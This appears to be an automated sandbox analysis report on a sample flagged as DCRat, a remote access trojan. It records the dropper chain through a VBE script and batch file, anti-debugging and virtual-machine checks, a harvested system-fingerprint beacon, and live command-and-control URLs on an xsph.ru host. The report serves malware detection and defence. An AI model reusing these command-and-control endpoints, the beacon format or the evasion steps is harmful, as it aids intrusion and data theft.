Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -596250s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_0059A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0059A5F4
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_005AB8E0
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005BAAA8 FindFirstFileExA,	0_2_005BAAA8

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005ADD72 VirtualQuery,GetSystemInfo,

0_2_005ADD72

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599103	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596250	Jump to behavior

Source: 5Ixz5yVfS7.exe, 00000000.00000003.2004636870.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Bridgecontainer.exe, 00000005.00000002.4475227298.000000001B9E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTU
Source: 5Ixz5yVfS7.exe, 00000000.00000003.2004636870.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yf
Source: wscript.exe, 00000002.00000002.2069774074.0000000002917000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

API call chain: ExitProcess graph end node

graph_0-23370

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_005B866F

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005B753D mov eax, dword ptr fs:[00000030h]

0_2_005B753D

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005BB710 GetProcessHeap,

0_2_005BB710

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AF063 SetUnhandledExceptionFilter,	0_2_005AF063
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005AF22B
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005B866F
Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Code function: 0_2_005AEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005AEF05

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\H0DkZX.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe "C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe"	Jump to behavior

Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"141700","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: erica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"141700","UserName":"user","IpInfo":{"ip":"8.46.123.189","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005AED5B cpuid

0_2_005AED5B

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_005AA63C

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_005AD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_005AD5D4

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Code function: 0_2_0059ACF5 GetVersionExW,

0_2_0059ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bridgecontainer.exe PID: 5688, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bridgecontainer.exe PID: 5688, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4473483339.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	2 Command and Scripting Interpreter	11 Scripting	12 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	136 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5Ixz5yVfS7.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
5Ixz5yVfS7.exe	58%	Virustotal		Browse
5Ixz5yVfS7.exe	100%	Avira	VBS/Runner.VPG
5Ixz5yVfS7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\N5OHKOq3jR1X.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	79%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://f1069581.xsph.ru	100%	Avira URL Cloud	malware
http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr	100%	Avira URL Cloud	malware
http://f1069581.xsph.ru/	100%	Avira URL Cloud	malware
http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
f1069581.xsph.ru	141.8.192.151	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://f1069581.xsph.ru/L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://f1069581.xsph.ru	Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://f1069581.xsph.ru/	Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://f1069581.xsph.ru/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr	Bridgecontainer.exe, 00000005.00000002.4473483339.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002D63000.00000004.00000800.00020000.00000000.sdmp, Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bridgecontainer.exe, 00000005.00000002.4473483339.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.151	f1069581.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583156
Start date and time:	2025-01-02 05:16:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5Ixz5yVfS7.exe renamed because original name is a hash value
Original Sample Name:	7b4eccf10cc4fa7263646f2fce4d7f8b.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 59% Number of executed functions: 185 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bridgecontainer.exe, PID 5688 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:17:05	API Interceptor	14720834x Sleep call for process: Bridgecontainer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.192.151	updater.exe	Get hash	malicious	Panda Stealer	Browse	f0837288.xsph.ru/collect.php
	updater.exe	Get hash	malicious	Panda Stealer	Browse	f0837288.xsph.ru/collect.php
	ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe	Get hash	malicious	Azorult	Browse	f0355889.xsph.ru/Panel/index.php
	gOKMPhOLiN.exe	Get hash	malicious	Phoenix Miner, ccminer	Browse	f0758246.xsph.ru//zima.php?mine=ETC
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	DWG Material, Standard BS 4360 GR. 40A43A.jar	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/dropbox.exe
	dropbox.exe	Get hash	malicious	Unknown	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	DWG spare parts 455RTMGF Model.exe	Get hash	malicious	Remcos	Browse	f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
	NotaFiscal.msi	Get hash	malicious	Unknown	Browse	f0717271.xsph.ru/serv.php
	Revised sales contract for Crosswear.rtf	Get hash	malicious	Snake Keylogger	Browse	f0705964.xsph.ru/mum.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	rWjaZEKha8.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	185.185.71.170
	aweqG2ssAY.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	vOizfcQSGf.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	EnoSY3z6MP.exe	Get hash	malicious	Cryptbot	Browse	185.185.71.170
	vH7JfdNi3c.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	U6mwWZlkzH.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	KzLv0EXDs1.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.185.71.170
	JiZQEd33mn.exe	Get hash	malicious	Unknown	Browse	185.185.71.170
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc	Browse	185.185.71.170

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Download File

Process:	C:\Users\user\Desktop\5Ixz5yVfS7.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847872
Entropy (8bit):	6.081704750510667
Encrypted:	false
SSDEEP:	12288:q82QUxESNOxxm8y5MahZvz0sPlgEjhoiXhQVOyYimx6d/FYt5fXyIs7xFPEEB:LU2xxm8eFjhoiRQROImS/7xFPd
MD5:	21879480EBF05FF55A58FC933CB818A4
SHA1:	24E6E72AC0E45DC8B66502CBB154A695BCC6A36E
SHA-256:	3C9BCD2B3DFAEDBB4F5D3A449917AC4A8CEE2F06E6FDAFF5FA2EC9CA6A56AE59
SHA-512:	A055FF6A5CD853761BA3445C7D4DC40528859EB486CBD09AAED87573AC73449CDC9B07C94324B94257F2DE43373BBF1B190B9CE9C242966E9C9F8D6E90F4D61B
Malicious:	true
